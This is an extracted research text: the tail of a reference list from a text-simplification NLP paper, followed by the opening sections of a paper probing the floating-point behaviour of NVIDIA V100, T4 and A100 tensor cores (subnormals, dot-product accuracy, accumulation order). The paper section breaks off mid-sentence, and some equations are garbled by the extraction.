Aluisio, S. M. (2009). Natural language process- ing for social inclusion: A text simplification ar- chitecture for different literacy levels. In Proceed- ings of SEMISH-XXXVI Seminário Integrado de Software e Hardware. Gerber, L. and Hovy, E. (1998). Improving transla- tion quality by manipulating sentence length. In 294 Machine Translation and the Information Soup, pages 448–460. Springer. Hwang, W., Hajishirzi, H., Ostendorf, M., and Wu, W. (2015). Aligning sentences from Standard Wikipedia to Simple Wikipedia. In Proceed- ings of the 2015 Conference of the North Ameri- can Chapter of the Association for Computational Linguistics (NAACL). Inui, K., Fujita, A., Takahashi, T., Iida, R., and Iwakura, T. (2003). Text simplification for read- ing assistance: A project note. In Proceedings of the 2nd International Workshop on Paraphrasing. Jaccard, P. (1912). The distribution of the flora in the alpine zone. New Phytologist, 11(2):37–50. Jurafsky, D., Chahuneau, V., Routledge, B. R., and Smith, N. A. (2014). Narrative framing of consumer sentiment in online restaurant reviews. First Monday, 19(4). Kauchak, D. (2013). Improving text simplification language modeling using unsimplified text data. In Proceedings of the 2013 Conference of the As- sociation for Computational Linguistics (ACL). Kincaid, J. P., Fishburne Jr, R. P., Rogers, R. L., and Chissom, B. S. (1975). Derivation of new read- ability formulas (automated readability index, fog count and flesch reading ease formula) for navy enlisted personnel. Technical report, DTIC Doc- ument. Klebanov, B. B., Knight, K., and Marcu, D. (2004). Text simplification for information-seeking appli- cations. In On the Move to Meaningful Inter- net Systems 2004: CoopIS, DOA, and ODBASE, pages 735–747. Springer. Klein, D. and Manning, C. D. (2002). Fast exact inference with a factored model for natural lan- guage parsing. In Advances in Neural Information Processing Systems. Louis, A. and Nenkova, A. (2013). What makes writing great? First experiments on article qual- ity prediction in the science journalism domain. Transactions of the Association for Computa- tional Linguistics (TACL), 1:341–352. Miwa, M., Saetre, R., Miyao, Y., and Tsujii, J. (2010). Entity-focused sentence simplification for relation extraction. In Proceedings of the 24th International Conference on Computational Lin- guistics (COLING). Monroe, B. L., Colaresi, M. P., and Quinn, K. M. (2008). Fightin’words: Lexical feature selection and evaluation for identifying the content of po- litical conflict. Political Analysis, 16(4):372–403. Moraes, P., McCoy, K., and Carberry, S. (2014). Adapting graph summaries to the users’ read- ing levels. In Proceedings of the 8th Interna- tional Natural Language Generation Conference (INLG). Napoles, C., Callison-Burch, C., and Van Durme, B. (2011). Evaluating sentence compression: Pit- falls and suggested remedies. In Proceedings of the Workshop on Monolingual Text-To-Text Gen- eration. Narayan, S. and Gardent, C. (2014). Hybrid simpli- fication using deep semantics and machine trans- lation. In Proceedings of the 52nd Annual Meet- ing of the Association for Computational Linguis- tics (ACL). Petersen, S. and Ostendorf, M. (2007). Text simpli- fication for language learners: A corpus analysis. In Proceedings of the Workshop on Speech and Language Technology for Education. Petersen, S. E. and Ostendorf, M. (2009). A ma- chine learning approach to reading level assess- ment. Computer Speech & Language, 23(1):89– 106. Pitler, E. and Nenkova, A. (2008). Revisiting read- ability: A unified framework for predicting text quality. In Proceedings of the Conference on Em- pirical Methods in Natural Language Processing (EMNLP). Porter, A., McMaken, J., Hwang, J., and Yang, R. (2011). Common Core Standards the new US intended curriculum. Educational Researcher, 40(3):103–116. Post, M. (2011). Judging grammaticality with tree substitution grammar derivations. In Proceedings of the 49th Annual Meeting of the Association for Computational Linguistics: Human Language Technologies (ACL-HLT). Riezler, S., King, T. H., Crouch, R., and Zaenen, A. (2003). Statistical sentence condensation us- 295 ing ambiguity packing and stochastic disambigua- tion methods for lexical-functional grammar. In Proceedings of the 2003 Conference of the North American Chapter of the Association for Compu- tational Linguistics: Human Language Technol- ogy (NAACL-HLT). Scarton, C., De Oliveira, M., Candido Jr, A., Gasperin, C., and Aluísio, S. M. (2010). Sim- plifica: A tool for authoring simplified texts in brazilian portuguese guided by readability assess- ments. In Proceedings of the 2010 Annual Con- ference of the North American Chapter of the As- sociation for Computational Linguistics: Human Language Technologies (NAACL-HLT). Siddharthan, A. (2003). Preserving discourse struc- ture when simplifying text. In Proceedings of Eu- ropean Workshop on Natural Language Genera- tion (ENLG). Siddharthan, A. (2006). Syntactic simplification and text cohesion. Research on Language and Com- putation, 4(1):77–109. Siddharthan, A. (2014). A survey of research on text simplification. Special issue of International Journal of Applied Linguistics, 165(2). Siddharthan, A. and Angrosh, M. (2014). Hybrid text simplification using synchronous dependency grammars with hand-written and automatically harvested rules. In Proceedings of the 25th Inter- national Conference on Computational Linguis- tics (COLING). Siddharthan, A. and Copestake, A. (2002). Generat- ing anaphora for simplifying text. In Proceedings of the 4th Discourse Anaphora and Anaphor Res- olution Colloquium (DAARC). Siddharthan, A. and Katsos, N. (2010). Reformulat- ing discourse connectives for non-expert readers. In Proceedings of the 2010 Annual Conference of the North American Chapter of the Association for Computational Linguistics: Human Language Technologies (NAACL-HLT). Siddharthan, A., Nenkova, A., and McKeown, K. (2004). Syntactic simplification for improving content selection in multi-document summariza- tion. In Proceedings of the 20th International Conference on Computational Linguistics (COL- ING). Vanderwende, L., Suzuki, H., Brockett, C., and Nenkova, A. (2007). Beyond SumBasic: Task- focused summarization with sentence simplifica- tion and lexical expansion. Information Process- ing & Management, 43(6):1606–1618. Vickrey, D. and Koller, D. (2008). Sentence simpli- fication for semantic role labeling. In Proceed- ings of the 46th Annual Meeting of the Associa- tion for Computational Linguistics: Human Lan- guage Technologies (ACL-HLT). Watanabe, W. M., Junior, A. C., Uzêda, V. R., Fortes, R. P. d. M., Pardo, T. A. S., and Aluísio, S. M. (2009). Facilita: reading assistance for low- literacy readers. In Proceedings of the 27th ACM International Conference on Design of Communi- cation. Weese, J., Ganitkevitch, J., and Callison-Burch, C. (2014). PARADIGM: Paraphrase diagnos- tics through grammar matching. In Proceedings of the 14th Conference of the European Chapter of the Association for Computational Linguistics (EACL). Williams, S., Reiter, E., and Osman, L. (2003). Ex- periments with discourse-level choices and read- ability. In Proceedings of the European Natural Language Generation Workshop (ENLG). Woodsend, K. and Lapata, M. (2011a). Learning to simplify sentences with quasi-synchronous gram- mar and integer programming. In Proceedings of the 2011 Conference on Empirical Methods in Natural Language Processing (EMNLP). Woodsend, K. and Lapata, M. (2011b). WikiSimple: Automatic simplification of Wikipedia articles. In Proceedings of the 25th Conference on Artificial Intelligence (AAAI). Wubben, S., van den Bosch, A., and Krahmer, E. (2012). Sentence simplification by monolingual machine translation. In Proceedings of the 50th Annual Meeting of the Association for Computa- tional Linguistics (ACL). Xu, W. and Grishman, R. (2009). A parse-and-trim approach with information significance for chi- nese sentence compression. In Proceedings of the 2009 Workshop on Language Generation and Summarisation. 296 Xu, W., Ritter, A., Dolan, B., Grishman, R., and Cherry, C. (2012). Paraphrasing for style. In Pro- ceedings of the 24th International Conference on Computational Linguistics (COLING). Xu, W., Ritter, A., and Grishman, R. (2013). Gather- ing and generating paraphrases from twitter with application to normalization. In Proceedings of the Sixth Workshop on Building and Using Com- parable Corpora (BUCC). Zhu, Z., Bernhard, D., and Gurevych, I. (2010). A monolingual tree-based translation model for sen- tence simplification. In Proceedings of the 23rd International Conference on Computational Lin- guistics (COLING). 297 298 work_j6zirmtczrav3e56ilniy62vbi ---- Numerical behavior of NVIDIA tensor cores Numerical behavior of NVIDIA tensor cores Massimiliano Fasi1, Nicholas J. Higham2, Mantas Mikaitis2 and Srikara Pranesh2 1 School of Science and Technology, Örebro University, Örebro, Sweden 2 Department of Mathematics, University of Manchester, Manchester, UK ABSTRACT We explore the floating-point arithmetic implemented in the NVIDIA tensor cores, which are hardware accelerators for mixed-precision matrix multiplication available on the Volta, Turing, and Ampere microarchitectures. Using Volta V100, Turing T4, and Ampere A100 graphics cards, we determine what precision is used for the intermediate results, whether subnormal numbers are supported, what rounding mode is used, in which order the operations underlying the matrix multiplication are performed, and whether partial sums are normalized. These aspects are not documented by NVIDIA, and we gain insight by running carefully designed numerical experiments on these hardware units. Knowing the answers to these questions is important if one wishes to: (1) accurately simulate NVIDIA tensor cores on conventional hardware; (2) understand the differences between results produced by code that utilizes tensor cores and code that uses only IEEE 754-compliant arithmetic operations; and (3) build custom hardware whose behavior matches that of NVIDIA tensor cores. As part of this work we provide a test suite that can be easily adapted to test newer versions of the NVIDIA tensor cores as well as similar accelerators from other vendors, as they become available. Moreover, we identify a non-monotonicity issue affecting floating point multi-operand adders if the intermediate results are not normalized after each step. Subjects Algorithms and Analysis of Algorithms, Computer Architecture, Scientific Computing and Simulation Keywords NVIDIA V100 GPU, NVIDIA T4 GPU, Tensor core, Dot product, Matrix multiply-accumulate, Floating-point arithmetic, Half precision, Binary16, IEEE 754 arithmetic, NVIDIA A100 GPU INTRODUCTION One hundred and sixteen of the computers in the November 2020 TOP500 list (https://www.top500.org/lists/top500/2020/11/) are equipped with NVIDIA graphics processing units (GPUs) based on the Volta, Turing, and Ampere microarchitectures. A prominent feature of these GPUs is the tensor cores, which are specialized hardware accelerators for performing a matrix multiply-accumulate operation. Here, in particular, we focus on the tensor cores available on the NVIDIA V100 (Volta microarchitecture), T4 (Turing architecture), and A100 (Ampere architecture) GPUs, which implement the operation How to cite this article Fasi M, Higham NJ, Mikaitis M, Pranesh S. 2021. Numerical behavior of NVIDIA tensor cores. PeerJ Comput. Sci. 7:e330 DOI 10.7717/peerj-cs.330 Submitted 20 July 2020 Accepted 12 November 2020 Published 10 February 2021 Corresponding author Mantas Mikaitis, mantas.mikaitis@manchester.ac.uk Academic editor Arun Somani Additional Information and Declarations can be found on page 16 DOI 10.7717/peerj-cs.330 Copyright 2021 Fasi et al. Distributed under Creative Commons CC-BY 4.0 https://www.top500.org/lists/top500/2020/11/ http://dx.doi.org/10.7717/peerj-cs.330 mailto:mantas.�mikaitis@�manchester.�ac.�uk https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.330 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ D ¼ C þ A � B; � � � � � � � � � � � � � � � � 2 664 3 775 |fflfflfflfflfflfflfflfflfflfflfflfflfflffl{zfflfflfflfflfflfflfflfflfflfflfflfflfflffl} binary16 or binary32 ¼ � � � � � � � � � � � � � � � � 2 664 3 775 |fflfflfflfflfflfflfflfflfflfflfflfflfflffl{zfflfflfflfflfflfflfflfflfflfflfflfflfflffl} binary16 or binary32 þ � � � � � � � � � � � � � � � � 2 664 3 775 |fflfflfflfflfflfflfflfflfflfflfflfflfflffl{zfflfflfflfflfflfflfflfflfflfflfflfflfflffl} binary16 � � � � � � � � � � � � � � � � � 2 664 3 775 |fflfflfflfflfflfflfflfflfflfflfflfflfflffl{zfflfflfflfflfflfflfflfflfflfflfflfflfflffl} binary16 (1) where A, B, C, and D are 4 × 4 matrices and “binaryxy” denotes the xy-bit format from the IEEE Standard 754 for floating-point arithmetic (IEEE, 2019). The entries of A and B must be in binary16 format, whereas those of C and D can be either binary16 or binary32 floating-point numbers depending on the accumulation mode. The newer A100 (Ampere microarchitecture) GPUs support a wider range of matrix dimensions, as well as an additional floating-point format, as shown in Table 1. The element dij in (1) can be seen as the sum of cij and the dot product between the ith row of A and the jth column of B, so that, for instance d11 ¼ a11b11 þ a12b21 þ a13b31 þ a14b41 þ c11: (2) Unfortunately, NVIDIA provides very little information about the numerical features of these units, and many questions naturally arise. The white paper that describes the Volta microarchitecture (NVIDIA, 2017, p. 15) states that1 Tensor Cores operate on FP16 input data with FP32 accumulation. The FP16 multiply results in a full precision product that is then accumulated using FP32 addition with the other intermediate products for a 4 × 4 × 4 matrix multiply. The official documentation (NVIDIA, 2020a) adds only a few more details: Element-wise multiplication of matrix A and B is performed with at least single precision. When .ctype or .dtype is .f32, accumulation of the intermediate values is performed with at least single precision. When both .ctype and .dtype are specified as .f16, the accumulation Table 1 Processing units or architectures equipped with mixed-precision matrix multiply- accumulate accelerators. The notation m × k × n refers to the matrix multiply-accumulate operation in (1) where C and D are m × n matrices, and A and B have size m × k and k × n, respectively. Year of release Device Matrix dimensions Input format Output format References 2016 Google TPU v2 128 × 128 × 128 bfloat16 binary32 Google (2020) 2017 Google TPU v3 128 × 128 × 128 bfloat16 binary32 Google (2020) 2017 NVIDIA V100 4 × 4 × 4 binary16 binary32 NVIDIA (2017) 2018 NVIDIA T4 4 × 4 × 4 binary16 binary32 NVIDIA (2018) 2019 Arm v8.6-A 2 × 4 × 2 bfloat16 binary32 Arm Ltd (2020) 2020 NVIDIA A100 8 × 8 × 4 bfloat16 binary32 NVIDIA (2020b) 8 × 8 × 4 binary16 binary32 4 × 8 × 4 TensorFloat-32 binary32 4 × 2 × 2 binary64 binary64 1 The binary16 and binary32 formats are sometimes referred to as fp16 (or FP16) and fp32 (or FP32), respectively. Fasi et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.330 2/19 http://dx.doi.org/10.7717/peerj-cs.330 https://peerj.com/computer-science/ is performed with at least half precision. The accumulation order, rounding and handling of subnormal inputs is unspecified. From a numerical point of view, many essential aspects of tensor cores are not specified. This lack of key information makes it challenging to simulate tensor cores on conventional IEEE 754-compliant systems and to build hardware that can reproduce their behavior. Moreover, it can lead to unexpected differences between the results computed on NVIDIA devices with tensor cores enabled or disabled. We now briefly recall some key aspects of IEEE-compliant floating-point systems and the definitions and main properties of normalization and subnormal numbers, which are two important concepts in this work. A binary floating-point number x has the form (−1)s × m × 2e − p, where s is the sign bit, p is the precision, m ∈ [0, 2p − 1] is the integer significand, and e ∈ [emin, emax], with emin = 1 − emax, is the integer exponent. In order for x to have a unique representation, the number system is normalized so that the most significant bit of m—the implicit bit in IEEE 754 parlance—is always set to 1 if |x| ≥ 2emin. Therefore, all floating-point numbers with m ≥ 2p − 1 are normalized. Numbers below the smallest normalized number 2emin in absolute value are called subnormal numbers, and are such that e = emin and 0 < m < 2 p − 1. Subnormal numbers provide a means to represent values in the subnormal range, that is, between 0 and the minimum normalized number. They have lower precision than normalized values (from p − 1 bits to as low as 1 bit), and require special treatment to be implemented in software and hardware. Therefore it is not uncommon for hardware manufacturers not to support them, in order to avoid performance or chip area overheads. In implementing floating-point operations the result of an operation must be normalized (if possible) by shifting the significand left or right until it falls within the interval [2p − 1, 2p − 1] and adjusting the exponent accordingly. More details can be found in Muller et al. (2018, Sec. 7.3). The IEEE 754 standard for floating-point arithmetic provides a somewhat relaxed set of requirements for reduction operations such as dot product and multi-operand addition (IEEE, 2019, Sec. 9.4): the order in which the partial sums should be evaluated is not prescribed, and the use of a higher-precision internal format is allowed. In particular, the standard does not specify: (1) whether this internal format should be normalized, as it would be if the multi-operand addition were implemented using IEEE 754 elementary arithmetic operations, (2) which rounding mode should be used, and (3) when the rounding should happen. These loose requirements can potentially cause the results computed with a given multi-operand addition unit to be significantly different from those obtained using other hardware implementations or a software implementation based on IEEE 754-compliant elementary arithmetic operations. With matrix multiplication being ubiquitous in artificial intelligence, accelerators for mixed-precision matrix multiply-accumulate operations are becoming widely available, as Table 1 shows. Hardware vendors often design these units focusing on performance rather than numerical reliability, and this may lead to the implementation of unconventional, non-IEEE-compliant arithmetics. Some of the hardware units in Table 1, for instance, use bfloat16, a 16-bit format that allocates 8 bits to the significand (including the implicit bit) Fasi et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.330 3/19 http://dx.doi.org/10.7717/peerj-cs.330 https://peerj.com/computer-science/ and 8 bits to the exponent and does not support subnormal numbers (Intel Corporation, 2018; Intel Corporation, 2020). It is worth noting that Volta is the first NVIDIA microarchitecture supporting tensor cores—the older Pascal GPUs, such as the P100, which are not reported in Table 1, supported binary16 arithmetic but did not include tensor cores. The NVIDIA Ampere A100 GPUs introduce a new 19-bit format called TensorFloat-32, which was designed to have the same dynamic range as binary32 (8 bits) and the same precision as binary16 (11 fraction bits, including the implicit bit) (NVIDIA, 2020b). In order to better understand the differences between the results computed using different systems, it is necessary to develop techniques to probe the numerical features of these units. The situation is reminiscent of that before the widespread adoption of the IEEE 754-1985 standard, when different floating-point arithmetics had different properties. To address the issue, Kahan (1981) developed a program called paranoia that analyzes and diagnoses a floating-point arithmetic, which was subsequently translated into C by Karpinski (1985). We follow a similar route: using idiosyncrasies of floating-point arithmetic, we design tests to better understand the numerical behavior of tensor cores, extending the testing approach recently introduced by Hickmann & Bradford (2019). Our aim is to explore the following questions. � Are subnormal inputs supported or are they flushed to zero? Can tensor cores produce subnormal numbers? � Are the multiplications in (2) exact and the additions performed in binary32 arithmetic, resulting in four rounding errors for each element of D? In what order are the four additions in (2) performed? � What rounding mode is used in (2)? � Is the result of each floating-point operation in (2) normalized, or do tensor cores only normalize the final sum? What rounding mode is used for the normalization? The answers to these questions are of wide interest because these accelerators, despite being introduced to accelerate the training of deep neural networks (NVIDIA, 2017, p. 12), are increasingly being used in general-purpose scientific computing, where their fast low precision arithmetic can be exploited in mixed-precision algorithms (Abdelfattah et al., 2020), for example in iterative refinement for linear systems (Haidar et al., 2018a, 2018b, 2020). The results discussed here were produced by running our test suite, which is freely available on GitHub (https://github.com/mfasi/tensor-cores-numerical-behavior). The file tc_test_numerics.cu can be compiled following the instructions in the README.md file, so as to produce an executable that will run all the tests we describe in the following sections and produce a report. We run the test suite on an NVIDIA Tesla V100 SXM2 16GB GPU (Volta microarchitecture), an NVIDIA Tesla T4 16GB GPU (Turing microarchitecture), and an NVIDIA Ampere A100-PCIA 40GB GPU. We used version 10.1 of the CUDA library on the machines equipped with the Volta and Turing cards, and version 11.1 on the machines equipped with the A100 GPU, as GPUs based on the Ampere microarchitecture require at least version 11 of the CUDA library in order to utilize the Fasi et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.330 4/19 https://github.com/mfasi/tensor-cores-numerical-behavior http://dx.doi.org/10.7717/peerj-cs.330 https://peerj.com/computer-science/ latest numerical features such as the TensorFloat-32 numerical type. Some graphic cards designed for intensive graphic processing workloads such as video gaming, computer- aided design, or computer-generated imagery, also include tensor cores: all the GPUs in the GeForce 20 and Quadro RTX series are based on the Turing microarchitecture, and those in the recently announced GeForce 30 series are based on the Ampere microarchitecture. We do not consider this wealth of different graphic cards here, as our focus is on the NVIDIA hardware that is present in the supercomputers in the TOP500 list and targets scientific computing applications. We stress, however, that the ideas we employ are very general and can be exploited to understand the numerical features of any hardware accelerator based on operations of the form (2). Finally, we remark that the binary16 arithmetic implemented in the NVIDIA CUDA cores is not fully IEEE 754 compliant, as round-to-nearest is the only rounding mode implemented for elementary arithmetic operations (NVIDIA, 2020c)—we use this observation in “Support for Subnormal Numbers”. PREVIOUS WORK From a hardware perspective, instruction-level details, register configuration, and memory layout of the tensor cores in the NVIDIA Volta (Jia et al., 2018b; Yan, Wang & Chu, 2020) and Turing (Yan, Wang & Chu, 2020; Jia et al., 2018a) GPUs have been extensively described. Another study by Basso, Dos Santos & Rech (2020) explores the reliability of tensor cores in terms of rate of hardware errors in matrix multiplications. The main finding is that low-precision operations and usage of tensor cores increase the amount of correct data produced by the GPU, despite increasing the impact of numerical errors due to the use of lower-precision data. In order to quantify the accuracy of tensor cores, Blanchard et al. (2020) provide a rounding error analysis of what they call a block fused multiply-add (FMA), a generalization of the multiply-accumulate operation in (1) in which the matrix sizes, the precisions of the arguments, and the internal precision of the accumulator are taken as parameters. Markidis et al. (2018) discuss various aspects of tensor cores and propose a technique, called precision refinement, to enhance the accuracy of mixed-precision matrix multiplication. Improving the accuracy of tensor-core-based matrix multiplications was further explored by Mukunoki et al. (2020). None of the these sources, however, examines to what extent tensor cores conform to the IEEE 754 standard or investigates how tensor cores compare with a matrix multiply-accumulate operation based on dot products implemented in software. Hickmann & Bradford (2019) explore some details of the numerical behavior of tensor cores with the main goal of inferring the hardware-level design of these units. Our work follows a similar approach and complements their findings by supplying further insights into the subject. We show that the additions in (2) are performed starting from the operand that is largest in magnitude, that at least 2 extra bits are used for carries, and that (2) may be non-monotonic for certain sets of inputs. Furthermore, we consider the second and third generation of the tensor cores, which equip the Turing T4 and Ampere A100 GPUs, respectively, and conclude that their internal accumulator has an extra bottom bit Fasi et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.330 5/19 http://dx.doi.org/10.7717/peerj-cs.330 https://peerj.com/computer-science/ compared with the tensor cores on V100 GPUs. Finally we make our test suite freely available, in order to guarantee reproducibility and facilitate testing other matrix multiply- accumulate units, such as the third generation tensor cores in the latest NVIDIA A100 GPUs (NVIDIA, 2020b). RESULTS In this section we describe our testing methodology and give the results obtained on the three NVIDIA graphics cards we considered. Table 2 summarizes the tests we performed and indicates the subsections in which they are described. Our methodology is to find test cases that demonstrate specific numerical behaviors and, by making the (quite reasonable) assumption that the hardware has a consistent behavior across the input space, conclude that the discovered features should be true for all possible inputs. NVIDIA Volta tensor cores Tensor cores can be accessed using the cuBLAS library, or the native hardware assembly instructions HMMA.884 (Jia et al., 2018a, 2018b) and HMMA.1688 (Yan, Wang & Chu, 2020; Jia et al., 2018a). In our experiments, we opted for the warp-level C++ function wmma::mma_sync(), which performs a 16 × 16 × 16 matrix multiply-accumulate operation. This is the lowest level interface to access the tensor cores in the NVIDIA CUDA programing environment. In order to use only a single tensor core, we set all but the top left 4 × 4 blocks to 0. We ensure that our experiments do use the tensor cores by running our test suite with the NVIDIA profiler nvprof, which shows the utilization levels of different hardware components on the GPU, and by observing that the assembly code produced by the nvcc compiler contains HMMA instructions. At the software level, tensor cores can be used in either binary16 or binary32 mode, which defines the number format of D in (1). Table 2 Summary of the subsections of “Results”. Section Devices used and description of tests performed on them NVIDIA Volta Tensor Cores Tests performed on the NVIDIA V100 (Volta) GPU Support for subnormal numbers Support for subnormal numbers (on the inputs, outputs and the computation of subnormals from the normalized inputs) Accuracy of the dot products Accuracy of the inner products performed as part of matrix multiply-accumulate (accuracy of scalar multiplies, accuracy of addition, and number of rounding errors introduced) Rounding modes in tensor core computations Tests for determining what rounding modes are used in the inner products and the final rounding Features of the accumulator Tests that explore the number of extra bits in the alignment step of floating-point addition inside the inner product (extra bits at the bottom of the internal significand) A test to find out whether the normalization is performed only at the end or after each addition in the computation of the inner products A similar test for the normalization in subtraction Tests for determining the number of extra bits for carries in floating-point addition (extra bits at the top of the internal significand) A test to check the monotonicity of the inner products NVIDIA Turing tensor cores All tests from “NVIDIA Volta Tensor Cores” rerun on the NVIDIA T4 (Turing) GPU NVIDIA Ampere tensor cores All tests from “NVIDIA Volta Tensor Cores” rerun on the NVIDIA A100 (Ampere) GPU Fasi et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.330 6/19 http://dx.doi.org/10.7717/peerj-cs.330 https://peerj.com/computer-science/ The experiments in this section were run on an NVIDIA Tesla V100 SXM2 16GB (Volta microarchitecture) GPU. Support for subnormal numbers We start by investigating the support for subnormal numbers, as this knowledge will dictate what range of input values we are allowed to use in subsequent tests. Table 3 compares precision, exponent range, machine epsilon, and magnitude of smallest representable subnormal and normal number for various floating-point number formats, including those supported by the three generations of tensor cores. By looking at the data in the table, we can make two important observations. First, conversion from binary16 to binary32 does not result in subnormal numbers. Second, the product of two binary16 numbers requires at most 22 bits for the significand, 6 bits for the exponent and one for the sign, and thus can be represented exactly in binary32. As for tensor cores, there are multiple questions regarding the support of subnormal numbers. 1. Can tensor cores take binary16 subnormal numbers as inputs for A and B in (2) without flushing them to zero, use them in computation, and return binary16 or binary32 normal or subnormal results? 2. Can tensor cores take binary32 subnormal numbers as inputs for C in (2) without flushing them to zero, use them in computation, and return subnormal binary32 results? 3. Can tensor cores compute subnormal numbers from normal numbers and return them? The first question can easily be addressed by considering (2) and setting a11 = 2 −24, b11 = 2 2 (arbitrarily chosen), and the remaining elements to zero. The tensor cores return the subnormal result a11 b11 = 2 −22 in both binary16 and binary32 mode, thereby answering the first question in the affirmative. An analogous idea can be used to clarify the second point: setting c11 to the smallest positive binary32 subnormal 2−149 and all the elements of A and B to zero yields d11 = 2 −149, which confirms that the subnormal number c11 is not altered by the dot product in (2). We note, however, that whether support for binary32 subnormals is needed is questionable. The absolute value of the smallest nonzero value that can be produced from the multiplication of two binary16 numbers is 2−48, thus c11 would not contribute to Table 3 Parameters of various floating-point formats: number of digits of precision including the implicit bit (p), boundary of the exponent range (emin and emax), machine epsilon (ε), and smallest positive representable normal (fmin) and subnormal (smin) numbers. The formats from the IEEE 754 standard (IEEE, 2019) are binary16, binary32, and binary64. binary16 bfloat16 TensorFloat-32 binary32 binary64 p 11 8 11 24 53 emax 15 127 127 127 1,023 emin −14 −126 −126 −126 −1,022 ɛ 2−10 2−7 2−10 2−23 2−52 fmin 2 −14 2−126 2−126 2−126 2−1022 smin 2 −24 2−133 2 − 136 2− 49 2−1074 Fasi et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.330 7/19 http://dx.doi.org/10.7717/peerj-cs.330 https://peerj.com/computer-science/ the sum if it were a binary32 subnormal: in binary32 arithmetic with round-to-nearest, one has that 2−48 + x > 2−48 only if x > 2−48 · 2−24 = 2−72, which is normal in binary32. For the third question, we can obtain subnormal numbers as outputs in several ways. For instance, we can set a11 to 2 −14, the smallest normal number in binary16, and b11 to 2 −1, and confirm that tensor cores return the binary16 subnormal 2−15 in both binary16 and binary32 modes. Another possibility is to set a11 = 2 −14, b11 = 1, and c11 = −2 −15, which produces the subnormal binary16 number d11 = 2 −15. As mentioned above, it is not possible to obtain subnormal binary32 numbers from binary16 inputs in (2). In summary, these experiments demonstrate that there is full support for subnormal inputs in tensor cores. One might wonder whether tensor cores natively support subnormals or some degree of software interaction is present. The NVIDIA profiler confirms that the experiments discussed in this section make use of the tensor cores, but we implemented an additional test to further reinforce the evidence that subnormals are supported in hardware. In “Rounding Modes in Tensor Core Computations” we show that tensor cores use round-towards-zero. We can use the fact that CUDA cores provide only round-to-nearest for binary16 computations to show that subnormals are in fact manipulated with tensor cores. In order to do so, we set a11 and a12 to 1, b11 to the binary16 subnormal 2 −23 + 2−24, b21 to 2 and the other elements of A and B to 0. Since the addition in (2) is done in binary32 arithmetic, the smallest value that can be exactly added to b21 = 2 is 2 −22. In this case, b11¼ 2�23 þ 2�24 ¼ 34 � 2�22 will either be round down to 0, if round-towards-zero is being used, or rounded up to 2−22, if the summation is carried out using the CUDA cores, which support only round-to-nearest. This computation returned the value 2, meaning that b11 was rounded down—a further indication that subnormals are natively supported by tensor cores. Accuracy of the dot products Our second goal is to test the accuracy of the dot product (2) with the tensor cores. The first step is to check that the products of two binary16 values are computed exactly, which implies that the products must be kept in some wider intermediate format and accumulated without being rounded back to binary16. Specifically we want to test that a1ibi1, for i = 1,…, 4, is computed exactly. This can be achieved by ensuring that the four multiplications produce floating-point numbers that are not representable in binary16 and checking that these are preserved and returned as binary32 entries of D. In order to demonstrate this, we set the first row of A and the first column of B to 1 − 2−11 and c11 to 0. The exact value of each partial product is (1 − 2 −11) · (1 − 2−11) = 1 − 2−10 + 2−22, which, depending on the rounding mode, would be rounded to either 1 − 2−10 or 1 − 2−11, if the products were stored in binary16. As tensor cores produce the exact binary32 answer d11 = 4 · (1 − 2 −10 + 2−22), we conclude that partial products are held exactly. Another question is whether the precision of the 5-operand addition in (2) changes in any way when binary16 is used to store the elements of the matrices C and D in (1). The test is to set a11 = b11 = a12 = 1 − 2 −11, b21 = 2 −11, and the remaining elements to 0. In this test, the first product a11b11 = 1 − 2 −10 + 2−22 requires precision higher than binary16 to be represented, whereas the second evaluates to a12b21 = 2 −11 − 2−22. The sum Fasi et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.330 8/19 http://dx.doi.org/10.7717/peerj-cs.330 https://peerj.com/computer-science/ of these two products is a11b11 + a12b21 = 1 − 2 −10 + 2−11, which is representable in binary16 but would not be computed exactly by a binary16 accumulator, since storing the first product requires higher precision. Indeed we found that tensor cores output the exact value, confirming that the partial products are still held exactly even when C and D are in binary16 format. A third question concerns the number of rounding errors in the 5-operand adder that accumulates the partial products. The dot product in (2) contains four additions, three to sum up the exact partial products and a fourth to add the binary32 argument c11. Our expectation is that the additions are done in binary32 rather than exactly, as indicated by NVIDIA (2017, 2020a). In order to confirm this, we can set the first row of A to 1, thereby reducing (2) to d11 ¼ b11 þ b21 þ b31 þ b41 þ c11; (3) and then run 5 different cases with one of the addends in (3) set to 1 and the rest set to 2−24. In this test, an exact addition would return 1 + 2−22, whereas inexact binary32 arithmetic would cause 4 round-off errors when adding 2−24 to 1, causing the number 1 to be returned. All permutations return d11 = 1, leading to the following conclusions. � In the worst case each element of D includes four rounding errors, which conforms to the block FMA model used by Blanchard et al. (2020, Sec. 2.1). � The partial products in (2) are not accumulated in a fixed order, but always starting from the largest value in magnitude. This sorting is necessary in order to know which arguments require to be shifted right in the significand alignment step of a standard floating-point addition algorithm (Muller et al., 2018, Sec. 7.3), (Tenca, 2009), and is most likely done in hardware. This is in line with the literature on hardware dot products (Kim & Kim, 2009; Tao et al., 2013; Sohn & Swartzlander, 2016; Kaul et al., 2019), where either sorting or a search for the maximum exponent is performed. Furthermore, this experiment demonstrates that none of the additions are performed before aligning the significands relative to the largest exponent: if evaluated before the arguments are shifted right relative to the largest magnitude arguments’ exponent (by having multiple alignment stages), any other sum would evaluate to 2−24 + 2−24 = 2−23, a value that then could be added exactly to the total sum as the least significand bits would not be lost in the alignment. In summary, each entry of D in (1) can have up to four rounding errors, and the 5- operand additions that compute each element are performed starting from the largest summand in absolute value. Rounding modes in tensor core computations If binary32 mode is used, only the four additions in (2) can be subject to rounding errors. The IEEE 754 standard defines four rounding modes for elementary arithmetic operations (IEEE, 2019, Sec. 4.3): round-to-nearest with even-on-ties, round-towards-zero, round-towards-minus-infinity, and round-towards-plus-infinity. In this section we use the Fasi et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.330 9/19 http://dx.doi.org/10.7717/peerj-cs.330 https://peerj.com/computer-science/ notation defined by Muller et al. (2018, Sec. 2.2.1) and denote these four rounding operators by RN, RZ, RD, and 